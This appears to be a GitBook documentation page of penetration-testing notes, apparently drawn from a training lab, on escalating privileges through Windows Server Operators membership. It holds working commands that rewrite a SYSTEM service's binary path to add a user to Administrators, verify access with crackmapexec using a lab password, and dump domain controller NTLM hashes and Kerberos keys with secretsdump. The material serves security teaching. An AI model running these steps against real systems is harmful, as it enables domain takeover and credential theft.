> For the complete documentation index, see [llms.txt](https://docs.wehost.co.in/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.wehost.co.in/cybersecurity/windows-server-operators.md). # Windows Server Operators * The Server Operators group allows members to administer Windows servers without needing assignment of Domain Admin privileges * It is a very highly privileged group that can log in locally to servers, including Domain Controllers. * Membership of this group confers the powerful `SeBackupPrivilege` and `SeRestorePrivilege` privileges and the ability to control local services. ### Querying the AppReadiness Service * Let's examine the `AppReadiness` service. We can confirm that this service starts as SYSTEM using the `sc.exe` utility ```cmd-session sc qc AppReadiness ``` ```cmd-session [SC] QueryServiceConfig SUCCESS SERVICE_NAME: AppReadiness TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Windows\System32\svchost.exe -k AppReadiness -p LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : App Readiness DEPENDENCIES : SERVICE_START_NAME : LocalSystem ``` ### Checking Service Permissions with PsService * We can use the service viewer/controller [PsService](https://docs.microsoft.com/en-us/sysinternals/downloads/psservice), which is part of the Sysinternals suite, to check permissions on the service. * `PsService` works much like the `sc` utility and can display service status and configurations and also allow you to start, stop, pause, resume, and restart services both locally and on remote hosts. ```cmd-session c:\Tools\PsService.exe security AppReadiness ``` ```cmd-session PsService v2.25 - Service information and configuration utility Copyright (C) 2001-2010 Mark Russinovich Sysinternals - www.sysinternals.com SERVICE_NAME: AppReadiness DISPLAY_NAME: App Readiness ACCOUNT: LocalSystem SECURITY: [ALLOW] NT AUTHORITY\SYSTEM Query status Query Config Interrogate Enumerate Dependents Pause/Resume Start Stop User-Defined Control Read Permissions [ALLOW] BUILTIN\Administrators All [ALLOW] NT AUTHORITY\INTERACTIVE Query status Query Config Interrogate Enumerate Dependents User-Defined Control Read Permissions [ALLOW] NT AUTHORITY\SERVICE Query status Query Config Interrogate Enumerate Dependents User-Defined Control Read Permissions [ALLOW] BUILTIN\Server Operators All ``` * This confirms that the Server Operators group has SERVICE\_ALL\_ACCESS access right, which gives us full control over this service. ### Checking Local Admin Group Membership ```cmd-session net localgroup Administrators ``` ```cmd-session Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator Domain Admins Enterprise Admins The command completed successfully. ``` ### Modifying the Service Binary Path ```cmd-session sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add" ``` ```cmd-session [SC] ChangeServiceConfig SUCCESS ``` ### Starting the Service * Starting the service fails, which is expected. ```cmd-session sc start AppReadiness ``` ```cmd-session [SC] StartService FAILED 1053: The service did not respond to the start or control request in a timely fashion. ``` ### Confirming Local Admin Group Membership ```cmd-session net localgroup Administrators ``` ```cmd-session Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator Domain Admins Enterprise Admins server_adm The command completed successfully. ``` ### Confirming Local Admin Access on Domain Controller * From here, we have full control over the Domain Controller and could retrieve all credentials from the NTDS database and access other systems, and perform post-exploitation tasks. ```shell-session crackmapexec smb 10.129.43.9 -u server_adm -p 'HTB_@cademy_stdnt!' ``` ```shell-session SMB 10.129.43.9 445 WINLPE-DC01 [*] Windows 10.0 Build 17763 (name:WINLPE-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False) SMB 10.129.43.9 445 WINLPE-DC01 [+] INLANEFREIGHT.LOCAL\server_adm:HTB_@cademy_stdnt! (Pwn3d!) ``` ### Retrieving NTLM Password Hashes from the Domain Controller ```shell-session secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator ``` ```shell-session Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation Password: [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:5db9c9ada113804443a8aeb64f500cd3e9670348719ce1436bcc95d1d93dad43 Administrator:aes128-cts-hmac-sha1-96:94c300d0e47775b407f2496a5cca1a0a Administrator:des-cbc-md5:d60dfbbf20548938 [*] Cleaning up... ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.wehost.co.in/cybersecurity/windows-server-operators.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.